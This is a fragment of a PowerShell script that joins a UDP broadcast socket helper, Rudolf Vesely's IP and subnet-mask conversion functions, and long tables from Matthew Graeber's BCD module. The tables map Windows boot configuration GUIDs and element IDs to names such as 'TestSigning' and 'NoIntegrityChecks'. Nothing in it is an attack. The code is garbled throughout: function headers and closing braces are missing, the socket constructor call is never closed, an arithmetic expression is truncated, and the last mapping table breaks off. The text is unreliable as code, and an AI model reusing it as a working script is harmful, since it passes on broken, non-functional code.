        [Int32]$SendTimeOut = 5,
        [Int32]$ReceiveTimeOut = 5

    $UdpSocket = New-Object Net.Sockets.Socket(
    $UdpSocket.EnableBroadcast = $True
    $UdpSocket.ExclusiveAddressUse = $False
    $UdpSocket.SendTimeOut = $SendTimeOut * 1000
    $UdpSocket.ReceiveTimeOut = $ReceiveTimeOut * 1000

    Return $UdpSocket
# Close down a Socket
Function Remove-Socket{


    ## Author: Rudolf Vesely
    ## Name : Convert subnet mask
    ## Link :
    ## License: Free for private use only 

Function Convert-RvNetIpAddressToInt64{ 
            Developer: Rudolf Vesely, 
            Copyright (c) Rudolf Vesely. All rights reserved 
            License: Free for private use only 
    $ipAddressParts = $IpAddress.Split('.') # IP to it's octets 
    # Return 
    [int64]([int64]$ipAddressParts[0] * 16777216 + 
            [int64]$ipAddressParts[1] * 65536 + 
            [int64]$ipAddressParts[2] * 256 + 

Function Convert-RvNetSubnetMaskClassesToCidr{ 
            Developer: Rudolf Vesely, 
            Copyright (c) Rudolf Vesely. All rights reserved 
            License: Free for private use only 
    [int64]$subnetMaskInt64 = Convert-RvNetIpAddressToInt64 -IpAddress $SubnetMask 
    $subnetMaskCidr32Int = 2147483648 # 0x80000000 - Same as Convert-RvNetIpAddressToInt64 -IpAddress '' 
    $subnetMaskCidr = 0 
    for ($i = 0; $i -lt 32; $i++) 
        if (!($subnetMaskInt64 -band $subnetMaskCidr32Int) -eq $subnetMaskCidr32Int) { break } # Bitwise and operator - Same as "&" in C# 
        $subnetMaskCidr32Int = $subnetMaskCidr32Int -shr 1 # Bit shift to the right - Same as ">>" in C# 
    # Return 

    ## Author: Matthew Graeber (@mattifestation)
    ## Name : BCD
    ## Github :
    ## License: BSD 3-Clause

#region module-scoped variables

# As new object and element types are added, they will need to be added here.
# Applying symbols to bcdedit.exe will typically get the job done.

# This is a mapping of well-known identifier->identifier (GUID)->type value
$Script:ObjectFriendlyNameMapping = @{
    'EmsSettings' =          @('{0CE4991B-E6B3-4B16-B23C-5E0D9250E5D9}', [UInt32] 0x20100000)
    'ResumeLoaderSettings' = @('{1AFA9C49-16AB-4A5C-901B-212802DA9460}', [UInt32] 0x20200004)
    'Default' =              @('{1CAE1EB7-A0DF-4D4D-9851-4860E34EF535}', [UInt32] 0x10200003)
    'KernelDbgSettings' =    @('{313E8EED-7098-4586-A9BF-309C61F8D449}', [UInt32] 0x20200003)
    'DbgSettings' =          @('{4636856E-540F-4170-A130-A84776F4C654}', [UInt32] 0x20100000)
    'EventSettings' =        @('{4636856E-540F-4170-A130-A84776F4C654}', [UInt32] 0x20100000)
    'Legacy' =               @('{466F5A88-0AF2-4F76-9038-095B170DC21C}', [UInt32] 0x10300006)
    'NtLdr' =                @('{466F5A88-0AF2-4F76-9038-095B170DC21C}', [UInt32] 0x10300006)
    'BadMemory' =            @('{5189B25C-5558-4BF2-BCA4-289B11BD29E2}', [UInt32] 0x20100000)
    'BootloaderSettings' =   @('{6EFB52BF-1766-41DB-A6B3-0EE5EFF72BD7}', [UInt32] 0x20200003)
    'GlobalSettings' =       @('{7EA2E1AC-2E61-4728-AAA3-896D9D0A9F0E}', [UInt32] 0x20100000)
    'HypervisorSettings' =   @('{7FF607E0-4395-11DB-B0DE-0800200C9A66}', [UInt32] 0x20200003)
    'BootMgr' =              @('{9DEA862C-5CDD-4E70-ACC1-F32B344D4795}', [UInt32] 0x10100002)
    'FWBootMgr' =            @('{A5A30FA2-3D06-4E9F-B5F4-A01DF9D1FCBA}', [UInt32] 0x10100001)
    'RamDiskOptions' =       @('{AE5534E0-A924-466C-B836-758539A3EE3A}', [UInt32] 0x30000000)
    'MemDiag' =              @('{B2721D73-1DB4-4C62-BF78-C548A880142D}', [UInt32] 0x10200005)
    'Current' =              @('{FA926493-6F1C-4193-A414-58F0B2456D1E}', [UInt32] 0x10200003)
    'SetupEFI' =             @('{7254A080-1510-4E85-AC0F-E7FB3D444736}', [UInt32] 0x10200003)
    'TargetTemplateEFI' =    @('{B012B84D-C47C-4ED5-B722-C0C42163E569}', [UInt32] 0x10200003)
    'SetupPCAT' =            @('{CBD971BF-B7B8-4885-951A-FA03044F5D71}', [UInt32] 0x10200003)
    'TargetTemplatePCAT' =   @('{A1943BBC-EA85-487C-97C7-C9EDE908A38A}', [UInt32] 0x10200003)

$Script:ObjectTypes = @{
    1 = 'Application'
    2 = 'Inherit'
    3 = 'Device'

$Script:ImageTypes = @{
    1 = 'Firmware'
    2 = 'WindowsBootApp'
    3 = 'LegacyLoader'
    4 = 'RealMode'

# reactos/boot/environ/include/bcd.h
$Script:ApplicationTypes = @{
    1 = 'FWBootMgr'
    2 = 'BootMgr'
    3 = 'OSLoader'
    4 = 'Resume'
    5 = 'MemDiag'
    6 = 'NTLdr'
    7 = 'SetupLdr'
    8 = 'Bootsector'
    9 = 'StartupCom'
    10 = 'BootApp'

$Script:InheritableTypes = @{
    1 = 'InheritableByAnyObject'
    2 = 'InheritableByApplicationObject'
    3 = 'InheritableByDeviceObject'

$Script:ElementTypes = @{
    1 = 'Library'
    2 = 'Application'
    3 = 'Device'
    4 = 'Template'
    5 = 'OEM'

$Script:ElementFormatTypes = @{
    1 = 'Device'   # Will map to the following Set-BCDElement param: -Device
    2 = 'String'   # Will map to the following Set-BCDElement param: -String
    3 = 'Id'       # Will map to the following Set-BCDElement param: -Object
    4 = 'Ids'      # Will map to the following Set-BCDElement param: -ObjectList
    5 = 'Integer'  # Will map to the following Set-BCDElement param: -Integer
    6 = 'Boolean'  # Will map to the following Set-BCDElement param: -Boolean
    7 = 'Integers' # Will map to the following Set-BCDElement param: -IntegerList

# Kind of a hack. I don't fully understand how inheritable
# object map properly so I merged all the existing definitions
# together minus collisions (which were removed).
$Script:ElementInheritableNameMapping = @{
    ([UInt32] 0x11000001) = 'Device'
    ([UInt32] 0x12000002) = 'Path'
    ([UInt32] 0x12000004) = 'Description'
    ([UInt32] 0x12000005) = 'Locale'
    ([UInt32] 0x14000006) = 'Inherit'
    ([UInt32] 0x15000007) = 'TruncateMemory'
    ([UInt32] 0x14000008) = 'RecoverySequence'
    ([UInt32] 0x16000009) = 'RecoveryEnabled'
    ([UInt32] 0x1700000A) = 'BadMemoryList'
    ([UInt32] 0x1600000B) = 'BadMemoryAccess'
    ([UInt32] 0x1500000C) = 'FirstMegabytePolicy'
    ([UInt32] 0x1500000D) = 'RelocatePhysical'
    ([UInt32] 0x1500000E) = 'AvoidLowMemory'
    ([UInt32] 0x1600000F) = 'TraditionalKseg'
    ([UInt32] 0x16000010) = 'BootDebug'
    ([UInt32] 0x15000011) = 'DebugType'
    ([UInt32] 0x15000012) = 'DebugAddress'
    ([UInt32] 0x15000013) = 'DebugPort'
    ([UInt32] 0x15000014) = 'BaudRate'
    ([UInt32] 0x15000015) = 'Channel'
    ([UInt32] 0x12000016) = 'TargetName'
    ([UInt32] 0x16000017) = 'NoUMEx'
    ([UInt32] 0x15000018) = 'DebugStart'
    ([UInt32] 0x12000019) = 'BusParams'
    ([UInt32] 0x1500001A) = 'HostIP'
    ([UInt32] 0x1500001B) = 'Port'
    ([UInt32] 0x1600001C) = 'DHCP'
    ([UInt32] 0x1200001D) = 'Key'
    ([UInt32] 0x1600001E) = 'VM'
    ([UInt32] 0x16000020) = 'BootEMS'
    ([UInt32] 0x15000022) = 'EMSPort'
    ([UInt32] 0x15000023) = 'EMSBaudRate'
    ([UInt32] 0x12000030) = 'LoadOptions'
    ([UInt32] 0x16000031) = 'AttemptNonBcdStart' # No actual friendly name defined
    ([UInt32] 0x16000040) = 'AdvancedOptions'
    ([UInt32] 0x16000041) = 'OptionsEdit'
    ([UInt32] 0x15000042) = 'KeyringAddress'
    ([UInt32] 0x11000043) = 'BootStatusDataLogDevice' # No actual friendly name defined
    ([UInt32] 0x12000044) = 'BootStatusDataLogPath' # No actual friendly name defined
    ([UInt32] 0x16000045) = 'PreserveBootStat'
    ([UInt32] 0x16000046) = 'GraphicsModeDisabled'
    ([UInt32] 0x15000047) = 'ConfigAccessPolicy'
    ([UInt32] 0x16000048) = 'NoIntegrityChecks'
    ([UInt32] 0x16000049) = 'TestSigning'
    ([UInt32] 0x1200004A) = 'FontPath'
    ([UInt32] 0x1500004B) = 'IntegrityServices' # BCDE_LIBRARY_TYPE_SI_POLICY
    ([UInt32] 0x1500004C) = 'VolumeBandId'
    ([UInt32] 0x16000050) = 'ExtendedInput'
    ([UInt32] 0x15000051) = 'InitialConsoleInput'
    ([UInt32] 0x15000052) = 'GraphicsResolution'
    ([UInt32] 0x16000053) = 'RestartOnFailure'
    ([UInt32] 0x16000054) = 'HighestMode'
    ([UInt32] 0x16000060) = 'IsolatedContext'
    ([UInt32] 0x15000065) = 'DisplayMessage'
    ([UInt32] 0x15000066) = 'DisplayMessageOverride'
    ([UInt32] 0x16000067) = 'NoBootUxLogo' # No actual friendly name defined
    ([UInt32] 0x16000068) = 'NoBootUxText'
    ([UInt32] 0x16000069) = 'NoBootUxProgress'
    ([UInt32] 0x1600006A) = 'NoBootUxFade'
    ([UInt32] 0x1600006B) = 'BootUxReservePoolDebug' # No actual friendly name defined
    ([UInt32] 0x1600006C) = 'BootUxDisabled'
    ([UInt32] 0x1500006D) = 'BootUxFadeFrames' # No actual friendly name defined
    ([UInt32] 0x1600006E) = 'BootUxDumpStats' # No actual friendly name defined
    ([UInt32] 0x1600006F) = 'BootUxShowStats' # No actual friendly name defined
    ([UInt32] 0x16000071) = 'MultiBootSystem' # No actual friendly name defined
    ([UInt32] 0x16000072) = 'NoKeyboard'
    ([UInt32] 0x15000073) = 'AliasWindowsKey' # No actual friendly name defined
    ([UInt32] 0x16000074) = 'BootShutdownDisabled'
    ([UInt32] 0x15000075) = 'PerformanceFrequency' # No actual friendly name defined
    ([UInt32] 0x15000076) = 'SecurebootRawPolicy'
    ([UInt32] 0x17000077) = 'AllowedInMemorySettings'
    ([UInt32] 0x15000079) = 'BootUxtTransitionTime'
    ([UInt32] 0x1600007A) = 'MobileGraphics'
    ([UInt32] 0x1600007B) = 'ForceFipsCrypto'
    ([UInt32] 0x1500007D) = 'BootErrorUx'
    ([UInt32] 0x1600007E) = 'FlightSigning'
    ([UInt32] 0x1500007F) = 'MeasuredBootLogFormat'
    ([UInt32] 0x25000001) = 'PassCount'
    ([UInt32] 0x25000003) = 'FailureCount'
    ([UInt32] 0x26000202) = 'SkipFFUMode'
    ([UInt32] 0x26000203) = 'ForceFFUMode'
    ([UInt32] 0x25000510) = 'ChargeThreshold'
    ([UInt32] 0x26000512) = 'OffModeCharging'
    ([UInt32] 0x25000AAA) = 'Bootflow'
    ([UInt32] 0x24000001) = 'DisplayOrder'
    ([UInt32] 0x24000002) = 'BootSequence'
    ([UInt32] 0x23000003) = 'Default'
    ([UInt32] 0x25000004) = 'Timeout'
    ([UInt32] 0x26000005) = 'AttemptResume'
    ([UInt32] 0x23000006) = 'ResumeObject'
    ([UInt32] 0x24000010) = 'ToolsDisplayOrder'
    ([UInt32] 0x26000020) = 'DisplayBootMenu'
    ([UInt32] 0x26000021) = 'NoErrorDisplay'
    ([UInt32] 0x21000022) = 'BcdDevice'
    ([UInt32] 0x22000023) = 'BcdFilePath'
    ([UInt32] 0x26000028) = 'ProcessCustomActionsFirst'
    ([UInt32] 0x27000030) = 'CustomActionsList'
    ([UInt32] 0x26000031) = 'PersistBootSequence'
    ([UInt32] 0x21000001) = 'FileDevice'
    ([UInt32] 0x22000002) = 'FilePath'
    ([UInt32] 0x26000006) = 'DebugOptionEnabled'
    ([UInt32] 0x25000008) = 'BootMenuPolicy'
    ([UInt32] 0x26000010) = 'DetectKernelAndHal'
    ([UInt32] 0x22000011) = 'KernelPath'
    ([UInt32] 0x22000012) = 'HalPath'
    ([UInt32] 0x22000013) = 'DbgTransportPath'
    ([UInt32] 0x25000020) = 'NX'
    ([UInt32] 0x25000021) = 'PAEPolicy'
    ([UInt32] 0x26000022) = 'WinPE'
    ([UInt32] 0x26000024) = 'DisableCrashAutoReboot'
    ([UInt32] 0x26000025) = 'UseLastGoodSettings'
    ([UInt32] 0x26000027) = 'AllowPrereleaseSignatures'
    ([UInt32] 0x26000030) = 'NoLowMemory'
    ([UInt32] 0x25000031) = 'RemoveMemory'
    ([UInt32] 0x25000032) = 'IncreaseUserVa'
    ([UInt32] 0x26000040) = 'UseVgaDriver'
    ([UInt32] 0x26000041) = 'DisableBootDisplay'
    ([UInt32] 0x26000042) = 'DisableVesaBios'
    ([UInt32] 0x26000043) = 'DisableVgaMode'
    ([UInt32] 0x25000050) = 'ClusterModeAddressing'
    ([UInt32] 0x26000051) = 'UsePhysicalDestination'
    ([UInt32] 0x25000052) = 'RestrictApicCluster'
    ([UInt32] 0x26000054) = 'UseLegacyApicMode'
    ([UInt32] 0x25000055) = 'X2ApicPolicy'
    ([UInt32] 0x26000060) = 'UseBootProcessorOnly'
    ([UInt32] 0x25000061) = 'NumberOfProcessors'
    ([UInt32] 0x26000062) = 'ForceMaximumProcessors'
    ([UInt32] 0x25000063) = 'ProcessorConfigurationFlags'
    ([UInt32] 0x26000064) = 'MaximizeGroupsCreated'
    ([UInt32] 0x26000065) = 'ForceGroupAwareness'
    ([UInt32] 0x25000066) = 'GroupSize'
    ([UInt32] 0x26000070) = 'UseFirmwarePciSettings'
    ([UInt32] 0x25000071) = 'MsiPolicy'
    ([UInt32] 0x25000080) = 'SafeBoot'
    ([UInt32] 0x26000081) = 'SafeBootAlternateShell'
    ([UInt32] 0x26000090) = 'BootLogInitialization'
    ([UInt32] 0x26000091) = 'VerboseObjectLoadMode'
    ([UInt32] 0x260000a0) = 'KernelDebuggerEnabled'
    ([UInt32] 0x260000a1) = 'DebuggerHalBreakpoint'
    ([UInt32] 0x260000A2) = 'UsePlatformClock'
    ([UInt32] 0x260000A3) = 'ForceLegacyPlatform'
    ([UInt32] 0x250000A6) = 'TscSyncPolicy'
    ([UInt32] 0x260000b0) = 'EmsEnabled'
    ([UInt32] 0x250000c1) = 'DriverLoadFailurePolicy'
    ([UInt32] 0x250000C2) = 'BootMenuPolicy'
    ([UInt32] 0x260000C3) = 'AdvancedOptionsOneTime'
    ([UInt32] 0x250000E0) = 'BootStatusPolicy'
    ([UInt32] 0x260000E1) = 'DisableElamDrivers'
    ([UInt32] 0x250000F0) = 'HypervisorLaunchType'
    ([UInt32] 0x260000F2) = 'HypervisorDebugEnabled'
    ([UInt32] 0x250000F3) = 'HypervisorDebugType'
    ([UInt32] 0x250000F4) = 'HypervisorDebugPort'
    ([UInt32] 0x250000F5) = 'HypervisorBaudrate'
    ([UInt32] 0x250000F6) = 'HypervisorDebug1394Channel'
    ([UInt32] 0x250000F7) = 'BootUxPolicy'
    ([UInt32] 0x220000F9) = 'HypervisorDebugBusParams'
    ([UInt32] 0x250000FA) = 'HypervisorNumProc'
    ([UInt32] 0x250000FB) = 'HypervisorRootProcPerNode'
    ([UInt32] 0x260000FC) = 'HypervisorUseLargeVTlb'
    ([UInt32] 0x250000FD) = 'HypervisorDebugNetHostIp'
    ([UInt32] 0x250000FE) = 'HypervisorDebugNetHostPort'
    ([UInt32] 0x25000100) = 'TpmBootEntropyPolicy'
    ([UInt32] 0x22000110) = 'HypervisorDebugNetKey'
    ([UInt32] 0x26000114) = 'HypervisorDebugNetDhcp'
    ([UInt32] 0x25000115) = 'HypervisorIommuPolicy'
    ([UInt32] 0x2500012b) = 'XSaveDisable'
    ([UInt32] 0x35000001) = 'RamdiskImageOffset'
    ([UInt32] 0x35000002) = 'TftpClientPort'
    ([UInt32] 0x31000003) = 'RamdiskSdiDevice'
    ([UInt32] 0x32000004) = 'RamdiskSdiPath'
    ([UInt32] 0x35000005) = 'RamdiskImageLength'
    ([UInt32] 0x36000006) = 'RamdiskExportAsCd'
    ([UInt32] 0x36000007) = 'RamdiskTftpBlockSize'
    ([UInt32] 0x36000008) = 'RamdiskTftpWindowSize'
    ([UInt32] 0x36000009) = 'RamdiskMulticastEnabled'
    ([UInt32] 0x3600000A) = 'RamdiskMulticastTftpFallback'
    ([UInt32] 0x3600000B) = 'RamdiskTftpVarWindow'
    ([UInt32] 0x45000001) = 'DeviceType' # No actual friendly name defined
    ([UInt32] 0x42000002) = 'ApplicationRelativePath' # No actual friendly name defined
    ([UInt32] 0x42000003) = 'RamdiskDeviceRelativePath' # No actual friendly name defined
    ([UInt32] 0x46000004) = 'OmitOsLoaderElements' # No actual friendly name defined
    ([UInt32] 0x47000006) = 'ElementsToMigrate'
    ([UInt32] 0x46000010) = 'RecoveryOs' # No actual friendly name defined

# Taken from
# These are also all available in bcdedit.exe public symbols
$Script:ElementLibraryNameMapping = @{
    ([UInt32] 0x11000001) = 'Device'
    ([UInt32] 0x12000002) = 'Path'
    ([UInt32] 0x12000004) = 'Description'
    ([UInt32] 0x12000005) = 'Locale'
    ([UInt32] 0x14000006) = 'Inherit'
    ([UInt32] 0x15000007) = 'TruncateMemory'
    ([UInt32] 0x14000008) = 'RecoverySequence'
    ([UInt32] 0x16000009) = 'RecoveryEnabled'
    ([UInt32] 0x1700000A) = 'BadMemoryList'
    ([UInt32] 0x1600000B) = 'BadMemoryAccess'
    ([UInt32] 0x1500000C) = 'FirstMegabytePolicy'
    ([UInt32] 0x1500000D) = 'RelocatePhysical'
    ([UInt32] 0x1500000E) = 'AvoidLowMemory'
    ([UInt32] 0x1600000F) = 'TraditionalKseg'
    ([UInt32] 0x16000010) = 'BootDebug'
    ([UInt32] 0x15000011) = 'DebugType'
    ([UInt32] 0x15000012) = 'DebugAddress'
    ([UInt32] 0x15000013) = 'DebugPort'
    ([UInt32] 0x15000014) = 'BaudRate'
    ([UInt32] 0x15000015) = 'Channel'
    ([UInt32] 0x12000016) = 'TargetName'
    ([UInt32] 0x16000017) = 'NoUMEx'
    ([UInt32] 0x15000018) = 'DebugStart'
    ([UInt32] 0x12000019) = 'BusParams'
    ([UInt32] 0x1500001A) = 'HostIP'
    ([UInt32] 0x1500001B) = 'Port'
    ([UInt32] 0x1600001C) = 'DHCP'
    ([UInt32] 0x1200001D) = 'Key'
    ([UInt32] 0x1600001E) = 'VM'
    ([UInt32] 0x16000020) = 'BootEMS'
    ([UInt32] 0x15000022) = 'EMSPort'
    ([UInt32] 0x15000023) = 'EMSBaudRate'
    ([UInt32] 0x12000030) = 'LoadOptions'
    ([UInt32] 0x16000031) = 'AttemptNonBcdStart' # No actual friendly name defined
    ([UInt32] 0x16000040) = 'AdvancedOptions'
    ([UInt32] 0x16000041) = 'OptionsEdit'
    ([UInt32] 0x15000042) = 'KeyringAddress'
    ([UInt32] 0x11000043) = 'BootStatusDataLogDevice' # No actual friendly name defined
    ([UInt32] 0x12000044) = 'BootStatusDataLogPath' # No actual friendly name defined
    ([UInt32] 0x16000045) = 'PreserveBootStat'
    ([UInt32] 0x16000046) = 'GraphicsModeDisabled'
    ([UInt32] 0x15000047) = 'ConfigAccessPolicy'
    ([UInt32] 0x16000048) = 'NoIntegrityChecks'
    ([UInt32] 0x16000049) = 'TestSigning'
    ([UInt32] 0x1200004A) = 'FontPath'
    ([UInt32] 0x1500004B) = 'IntegrityServices' # BCDE_LIBRARY_TYPE_SI_POLICY
    ([UInt32] 0x1500004C) = 'VolumeBandId'
    ([UInt32] 0x16000050) = 'ExtendedInput'
    ([UInt32] 0x15000051) = 'InitialConsoleInput'
    ([UInt32] 0x15000052) = 'GraphicsResolution'
    ([UInt32] 0x16000053) = 'RestartOnFailure'
    ([UInt32] 0x16000054) = 'HighestMode'
    ([UInt32] 0x16000060) = 'IsolatedContext'
    ([UInt32] 0x15000065) = 'DisplayMessage'
    ([UInt32] 0x15000066) = 'DisplayMessageOverride'
    ([UInt32] 0x16000067) = 'NoBootUxLogo' # No actual friendly name defined
    ([UInt32] 0x16000068) = 'NoBootUxText'
    ([UInt32] 0x16000069) = 'NoBootUxProgress'
    ([UInt32] 0x1600006A) = 'NoBootUxFade'
    ([UInt32] 0x1600006B) = 'BootUxReservePoolDebug' # No actual friendly name defined
    ([UInt32] 0x1600006C) = 'BootUxDisabled'
    ([UInt32] 0x1500006D) = 'BootUxFadeFrames' # No actual friendly name defined
    ([UInt32] 0x1600006E) = 'BootUxDumpStats' # No actual friendly name defined
    ([UInt32] 0x1600006F) = 'BootUxShowStats' # No actual friendly name defined
    ([UInt32] 0x16000071) = 'MultiBootSystem' # No actual friendly name defined
    ([UInt32] 0x16000072) = 'NoKeyboard'
    ([UInt32] 0x15000073) = 'AliasWindowsKey' # No actual friendly name defined
    ([UInt32] 0x16000074) = 'BootShutdownDisabled'
    ([UInt32] 0x15000075) = 'PerformanceFrequency' # No actual friendly name defined
    ([UInt32] 0x15000076) = 'SecurebootRawPolicy'
    ([UInt32] 0x17000077) = 'AllowedInMemorySettings'
    ([UInt32] 0x15000079) = 'BootUxtTransitionTime'
    ([UInt32] 0x1600007A) = 'MobileGraphics'
    ([UInt32] 0x1600007B) = 'ForceFipsCrypto'
    ([UInt32] 0x1500007D) = 'BootErrorUx'
    ([UInt32] 0x1600007E) = 'FlightSigning'
    ([UInt32] 0x1500007F) = 'MeasuredBootLogFormat'

$Script:ElementMemDiagNameMapping = @{
    ([UInt32] 0x25000001) = 'PassCount'
    ([UInt32] 0x25000003) = 'FailureCount'

$Script:ElementApplicationNameMapping = @{
    ([UInt32] 0x26000202) = 'SkipFFUMode'
    ([UInt32] 0x26000203) = 'ForceFFUMode'
    ([UInt32] 0x25000510) = 'ChargeThreshold'
    ([UInt32] 0x26000512) = 'OffModeCharging'
    ([UInt32] 0x25000AAA) = 'Bootflow'

$Script:ElementBootMgrNameMapping = @{
    ([UInt32] 0x24000001) = 'DisplayOrder'
    ([UInt32] 0x24000002) = 'BootSequence'
    ([UInt32] 0x23000003) = 'Default'
    ([UInt32] 0x25000004) = 'Timeout'
    ([UInt32] 0x26000005) = 'AttemptResume'
    ([UInt32] 0x23000006) = 'ResumeObject'
    ([UInt32] 0x24000010) = 'ToolsDisplayOrder'
    ([UInt32] 0x26000020) = 'DisplayBootMenu'
    ([UInt32] 0x26000021) = 'NoErrorDisplay'
    ([UInt32] 0x21000022) = 'BcdDevice'
    ([UInt32] 0x22000023) = 'BcdFilePath'
    ([UInt32] 0x26000028) = 'ProcessCustomActionsFirst'
    ([UInt32] 0x27000030) = 'CustomActionsList'
    ([UInt32] 0x26000031) = 'PersistBootSequence'
    ([UInt32] 0x21000001) = 'FileDevice'
    ([UInt32] 0x22000002) = 'FilePath'
    ([UInt32] 0x26000006) = 'DebugOptionEnabled'
    ([UInt32] 0x25000008) = 'BootMenuPolicy'

$Script:ElementOSLoaderNameMapping = @{
    ([UInt32] 0x21000001) = 'OSDevice'
    ([UInt32] 0x22000002) = 'SystemRoot'
    ([UInt32] 0x23000003) = 'ResumeObject'
    ([UInt32] 0x26000010) = 'DetectKernelAndHal'
    ([UInt32] 0x22000011) = 'KernelPath'
    ([UInt32] 0x22000012) = 'HalPath'
    ([UInt32] 0x22000013) = 'DbgTransportPath'
    ([UInt32] 0x25000020) = 'NX'
    ([UInt32] 0x25000021) = 'PAEPolicy'
    ([UInt32] 0x26000022) = 'WinPE'
    ([UInt32] 0x26000024) = 'DisableCrashAutoReboot'
    ([UInt32] 0x26000025) = 'UseLastGoodSettings'
    ([UInt32] 0x26000027) = 'AllowPrereleaseSignatures'
    ([UInt32] 0x26000030) = 'NoLowMemory'
    ([UInt32] 0x25000031) = 'RemoveMemory'
    ([UInt32] 0x25000032) = 'IncreaseUserVa'
    ([UInt32] 0x26000040) = 'UseVgaDriver'
    ([UInt32] 0x26000041) = 'DisableBootDisplay'
    ([UInt32] 0x26000042) = 'DisableVesaBios'
    ([UInt32] 0x26000043) = 'DisableVgaMode'
    ([UInt32] 0x25000050) = 'ClusterModeAddressing'
    ([UInt32] 0x26000051) = 'UsePhysicalDestination'
    ([UInt32] 0x25000052) = 'RestrictApicCluster'
    ([UInt32] 0x26000054) = 'UseLegacyApicMode'
    ([UInt32] 0x25000055) = 'X2ApicPolicy'
    ([UInt32] 0x26000060) = 'UseBootProcessorOnly'
    ([UInt32] 0x25000061) = 'NumberOfProcessors'
    ([UInt32] 0x26000062) = 'ForceMaximumProcessors'
    ([UInt32] 0x25000063) = 'ProcessorConfigurationFlags'
    ([UInt32] 0x26000064) = 'MaximizeGroupsCreated'
    ([UInt32] 0x26000065) = 'ForceGroupAwareness'
    ([UInt32] 0x25000066) = 'GroupSize'
    ([UInt32] 0x26000070) = 'UseFirmwarePciSettings'
    ([UInt32] 0x25000071) = 'MsiPolicy'
    ([UInt32] 0x25000080) = 'SafeBoot'
    ([UInt32] 0x26000081) = 'SafeBootAlternateShell'
    ([UInt32] 0x26000090) = 'BootLogInitialization'
    ([UInt32] 0x26000091) = 'VerboseObjectLoadMode'
    ([UInt32] 0x260000a0) = 'KernelDebuggerEnabled'
    ([UInt32] 0x260000a1) = 'DebuggerHalBreakpoint'
    ([UInt32] 0x260000A2) = 'UsePlatformClock'
    ([UInt32] 0x260000A3) = 'ForceLegacyPlatform'
    ([UInt32] 0x250000A6) = 'TscSyncPolicy'
    ([UInt32] 0x260000b0) = 'EmsEnabled'
    ([UInt32] 0x250000c1) = 'DriverLoadFailurePolicy'
    ([UInt32] 0x250000C2) = 'BootMenuPolicy'
    ([UInt32] 0x260000C3) = 'AdvancedOptionsOneTime'
    ([UInt32] 0x250000E0) = 'BootStatusPolicy'
    ([UInt32] 0x260000E1) = 'DisableElamDrivers'
    ([UInt32] 0x250000F0) = 'HypervisorLaunchType'
    ([UInt32] 0x260000F2) = 'HypervisorDebugEnabled'
    ([UInt32] 0x250000F3) = 'HypervisorDebugType'
    ([UInt32] 0x250000F4) = 'HypervisorDebugPort'
    ([UInt32] 0x250000F5) = 'HypervisorBaudrate'
    ([UInt32] 0x250000F6) = 'HypervisorDebug1394Channel'
    ([UInt32] 0x250000F7) = 'BootUxPolicy'
    ([UInt32] 0x220000F9) = 'HypervisorDebugBusParams'
    ([UInt32] 0x250000FA) = 'HypervisorNumProc'
    ([UInt32] 0x250000FB) = 'HypervisorRootProcPerNode'
    ([UInt32] 0x260000FC) = 'HypervisorUseLargeVTlb'
    ([UInt32] 0x250000FD) = 'HypervisorDebugNetHostIp'
    ([UInt32] 0x250000FE) = 'HypervisorDebugNetHostPort'
    ([UInt32] 0x25000100) = 'TpmBootEntropyPolicy'
    ([UInt32] 0x22000110) = 'HypervisorDebugNetKey'
    ([UInt32] 0x26000114) = 'HypervisorDebugNetDhcp'
    ([UInt32] 0x25000115) = 'HypervisorIommuPolicy'
    ([UInt32] 0x2500012b) = 'XSaveDisable'

$Script:ElementDeviceNameMapping = @{
    ([UInt32] 0x35000001) = 'RamdiskImageOffset'
    ([UInt32] 0x35000002) = 'TftpClientPort'
    ([UInt32] 0x31000003) = 'RamdiskSdiDevice'
    ([UInt32] 0x32000004) = 'RamdiskSdiPath'
    ([UInt32] 0x35000005) = 'RamdiskImageLength'
    ([UInt32] 0x36000006) = 'RamdiskExportAsCd'
    ([UInt32] 0x36000007) = 'RamdiskTftpBlockSize'
    ([UInt32] 0x36000008) = 'RamdiskTftpWindowSize'
    ([UInt32] 0x36000009) = 'RamdiskMulticastEnabled'
    ([UInt32] 0x3600000A) = 'RamdiskMulticastTftpFallback'
    ([UInt32] 0x3600000B) = 'RamdiskTftpVarWindow'

$Script:ElementTemplateNameMapping = @{
    ([UInt32] 0x45000001) = 'DeviceType' # No actual friendly name defined
    ([UInt32] 0x42000002) = 'ApplicationRelativePath' # No actual friendly name defined
    ([UInt32] 0x42000003) = 'RamdiskDeviceRelativePath' # No actual friendly name defined
    ([UInt32] 0x46000004) = 'OmitOsLoaderElements' # No actual friendly name defined
    ([UInt32] 0x47000006) = 'ElementsToMigrate'
    ([UInt32] 0x46000010) = 'RecoveryOs' # No actual friendly name defined

$Script:ElementNameToValueMapping = @{
    'Device' = ([UInt32] 0x11000001)
    'Path' = ([UInt32] 0x12000002)
    'Description' = ([UInt32] 0x12000004)
    'Locale' = ([UInt32] 0x12000005)
    'Inherit' = ([UInt32] 0x14000006)
    'TruncateMemory' = ([UInt32] 0x15000007)
    'RecoverySequence' = ([UInt32] 0x14000008)
    'RecoveryEnabled' = ([UInt32] 0x16000009)
    'BadMemoryList' = ([UInt32] 0x1700000A)
    'BadMemoryAccess' = ([UInt32] 0x1600000B)
    'FirstMegabytePolicy' = ([UInt32] 0x1500000C)
    'RelocatePhysical' = ([UInt32] 0x1500000D)
    'AvoidLowMemory' = ([UInt32] 0x1500000E)
    'TraditionalKseg' = ([UInt32] 0x1600000F)
    'BootDebug' = ([UInt32] 0x16000010)
    'DebugType' = ([UInt32] 0x15000011)
    'DebugAddress' = ([UInt32] 0x15000012)
    'DebugPort' = ([UInt32] 0x15000013)
    'BaudRate' = ([UInt32] 0x15000014)
    'Channel' = ([UInt32] 0x15000015)
    'TargetName' = ([UInt32] 0x12000016)
    'NoUMEx' = ([UInt32] 0x16000017)
    'DebugStart' = ([UInt32] 0x15000018)
    'BusParams' = ([UInt32] 0x12000019)
    'HostIP' = ([UInt32] 0x1500001A)
    'Port' = ([UInt32] 0x1500001B)
    'DHCP' = ([UInt32] 0x1600001C)
    'Key' = ([UInt32] 0x1200001D)
    'VM' = ([UInt32] 0x1600001E)
    'BootEMS' = ([UInt32] 0x16000020)
    'EMSPort' = ([UInt32] 0x15000022)
    'EMSBaudRate' = ([UInt32] 0x15000023)
    'LoadOptions' = ([UInt32] 0x12000030)
    'AttemptNonBcdStart' = ([UInt32] 0x16000031)
    'AdvancedOptions' = ([UInt32] 0x16000040)
    'OptionsEdit' = ([UInt32] 0x16000041)
    'KeyringAddress' = ([UInt32] 0x15000042)
    'BootStatusDataLogDevice' = ([UInt32] 0x11000043)
